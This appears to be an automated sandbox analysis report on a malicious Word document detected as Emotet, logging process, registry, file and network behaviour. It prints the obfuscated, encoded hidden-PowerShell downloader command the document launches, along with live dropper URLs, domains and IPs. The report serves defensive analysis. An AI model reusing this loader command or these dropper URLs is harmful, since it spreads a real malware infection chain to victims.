Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004C5A cpuid

7_2_10004C5A

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

7_2_10007D46

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
210.86.239.69	unknown	Viet Nam	24173	NETNAM-AS-APNetnamCompanyVN	true
209.59.139.39	unknown	United States	32244	LIQUIDWEBUS	true
172.67.141.14	unknown	United States	13335	CLOUDFLARENETUS	true
45.130.229.91	unknown	Germany	47583	AS-HOSTINGERLT	true
5.2.136.90	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true
172.67.158.72	unknown	United States	13335	CLOUDFLARENETUS	true

Contacted Domains

Name	IP	Active
veterinariadrpopui.com	209.59.139.39	true
wpsapk.com	172.67.141.14	true
sofsuite.com	172.67.158.72	true
khanhhoahomnay.net	210.86.239.69	true
shop.elemenslide.com	45.130.229.91	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://veterinariadrpopui.com/content/5f18Q/	true	Avira URL Cloud: malware	unknown
http://sofsuite.com/wp-includes/2jm3nIk/	true	Avira URL Cloud: phishing	unknown
http://khanhhoahomnay.net/wordpress/CGMC/	true	Avira URL Cloud: malware	unknown
http://shop.elemenslide.com/wp-content/n/	true	Avira URL Cloud: malware	unknown
http://wpsapk.com/wp-admin/v/	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://veterinariadrpopui.com	Avira URL Cloud: Label: malware
Source: http://veterinariadrpopui.com/content/5f18Q/	Avira URL Cloud: Label: malware
Source: http://sofsuite.com/wp-includes/2jm3nIk/	Avira URL Cloud: Label: phishing
Source: http://khanhhoahomnay.net/wordpress/CGMC/	Avira URL Cloud: Label: malware
Source: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/	Avira URL Cloud: Label: malware
Source: http://wpsapk.com/wp-admin/v/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: veterinariadrpopui.com	Virustotal: Detection: 7%			Perma Link
Source: khanhhoahomnay.net	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for submitted file

Source: MAIL-0573188.doc	Virustotal: Detection: 66%			Perma Link
Source: MAIL-0573188.doc	Metadefender: Detection: 47%			Perma Link

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,	7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,	7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,	7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F75AE CryptDecodeObjectEx,	13_2_001F75AE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F109C FindFirstFileW,

13_2_001F109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: wpsapk.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 45.130.229.91:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.141.14:80

Networking:

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
